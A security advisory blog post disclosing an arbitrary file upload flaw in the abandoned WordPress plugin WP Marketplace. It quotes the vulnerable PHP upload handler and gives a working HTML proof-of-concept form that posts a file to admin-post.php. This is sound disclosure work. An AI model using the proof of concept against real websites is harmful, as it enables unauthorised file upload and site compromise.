14 Oct

Arbitrary File Upload Vulnerability in WP Marketplace

When it comes to certain types of plugins you would hope that developers would be extra careful when it comes to security, one of them being eCommerce plugins for obvious reasons, but we have continued to see poor security practices with that type of plugin. Among the vulnerabilities we have found in them this year, have been two arbitrary file upload vulnerabilities, which is probably the most likely type of vulnerability to be exploited. As part of monitoring of hacker activity we have just spotted another one, this time it is one that is likely already being exploited.

Within the last day we had a request for the file /wp-content/plugins/wpmarketplace/css/extends_page.css, which is part of the plugin WP Marketplace. Requesting a file from a plugin that isn’t installed on a website is usually indication that a hacker is probing for usage of it before exploiting something. We have also seen some requests for the file in the third-party data we monitor as well.

Seeing as arbitrary file upload vulnerabilities are so likely to be exploited, one of the first things we look for when trying to determine what hackers might be exploiting in a plugin is that type of issue. In this case we quickly found one.

In the file /modules/additional-preview-images.php the function wpmp_upload_previews() is made accessible when loading admin pages (as the function is_admin() tells you that, not if the user is Administrator):

148
149
150
151
152
153
154
155
156
if(is_admin())  {
    /*wp_enqueue_script('swfobject',plugins_url().'/wpmarketplace/uploadify/swfobject.js');
    wp_enqueue_script('uploadify',plugins_url().'/wpmarketplace/uploadify/jquery.uploadify.v2.1.4.min.js');
    wp_enqueue_style('uploadify',plugins_url().'/wpmarketplace/uploadify/uploadify.css');*/
 
    add_action("init","wpmp_upload_previews");
    add_action("wp_ajax_wpmp_delete_preview","wpmp_delete_preview");
    add_filter("wpmp_meta_box","wpmp_meta_box_images");
}

The wpmp_upload_previews() then will save an uploaded file to the file system without doing checks as to who is making the request, leading to an arbitrary file upload vulnerability:

108
109
110
111
112
113
114
115
116
117
118
function wpmp_upload_previews(){
     $adpdir = WPMP_IMAGE_DIR;
     if((isset($_GET['task'],$_FILES['Filedata']['tmp_name']) && is_uploaded_file($_FILES['Filedata']['tmp_name'])   && $_GET['task']=='wpmp_upload_previews')){
        $tempFile = $_FILES['Filedata']['tmp_name'];    
        $targetFile =  $adpdir ."wpdm-adp-". time().'-'.wpmp_format_name($_FILES['Filedata']['name']);
        move_uploaded_file($tempFile, $targetFile);
        echo basename($targetFile);        
        die();
     }
 
}

Development of the plugin stopped some time ago, so we are disclosing the vulnerability and notifying the Plugin Directory.

On the plugin’s page on wordpress.org, it is mentioned at the top that developers of this plugin are also the developers of the WordPress Download Manager plugin, for which we discovered an authenticated arbitrary file upload vulnerability nearly four months ago that still haven’t been fixed. So security doesn’t seem to be a priority for them in general.

Proof of Concept

The following proof of concept will upload the selected file to the directory /wp-content/uploads/wpmp-previews/.

Make sure to replace “[path to WordPress]” with the location of WordPress.

<html>
<body>
<form action="http://[path to WordPress]/wp-admin/admin-post.php?task=wpmp_upload_previews" method="POST" enctype="multipart/form-data">
<input type="file" name="Filedata" />
<input type="submit" value="Submit" />
</form>
</body>
</html>

Timeline

  • 10/14/2016 – WordPress.org Plugin Directory notified.
  • 10/14/2016 – Plugin removed from WordPress.org Plugin Directory.

Concerned About The Security of The Plugins You Use?

When you are a paying customer of our service (you can currently try the service free for the first month), you get to suggest/vote on what plugins we will do security reviews of.

Leave a Reply

Your email address will not be published. Required fields are marked *